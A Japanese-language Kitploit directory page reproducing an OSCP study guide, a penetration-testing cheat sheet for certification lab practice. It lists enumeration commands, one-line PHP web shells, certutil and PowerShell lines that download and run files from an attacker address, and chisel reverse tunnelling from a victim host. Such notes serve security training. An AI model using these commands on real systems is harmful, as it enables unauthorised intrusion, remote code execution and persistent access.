Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/rootsecdev/oscp
ReconnaissanceExploitationWeb Application ExploitationPost-ExploitationWeb SecurityNetwork SecurityPenetration TestingLearning & EducationRed Teaming
GitHubrootsecdev/oscp

OSCP

OSCP Study Guide

4253年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
OSCP — OSCP Study Guide | Kitploit
リポジトリを見る

OSCP

OSCP 学習ガイド

目次

列挙と偵察

Web 列挙

Nikto スキャン:

root@kitploit:~
nikto -h http://10.10.10.1

さまざまなツールを使ったディレクトリバスティング:

DIRB

root@kitploit:~
dirb http://10.10.10.1

Gobuster

root@kitploit:~
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

Web アプリケーションのペネトレーションテスト

XSS ペイロード: チートシート: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

netcat リスナーまたは Python Web サーバーを使用した基本的な XSS フォームテスト

root@kitploit:~

base64 クッキーをダンプするためのクロスサイトスクリプティング。Burp では ctrl + u で URL エンコードしてください。

root@kitploit:~

Web シェル

参照: https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html

コマンド実行用のシンプルな PHP Web シェル

root@kitploit:~
<?php system($_REQUEST ['cmd']) ?>
root@kitploit:~
<?php system($_GET['cmd']); ?>

SNMP のペネトレーションテスト

UDP ポート 161

root@kitploit:~
snmpwalk -c public -v2c 10.129.213.210
root@kitploit:~
snmp-check 10.129.213.210

SMB のペネトレーションテスト

root@kitploit:~
crackmapexec smb 10.129.70.254 

オープンな匿名共有を検出する

root@kitploit:~
smbclient -L //10.129.70.254

Null 認証

root@kitploit:~
smbclient -N -L //10.129.70.254

ポストエクスプロイテーション

ファイルのダウンロードと転送

Certutil:

root@kitploit:~
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

PowerShell:

root@kitploit:~
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
root@kitploit:~
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"

ポートフォワーディングとトンネリング

Chisel の使用:

Kali ボックス上でポート 910 を利用可能にするポートフォワーディングの例

root@kitploit:~
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
root@kitploit:~
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse
ツールをダウンロード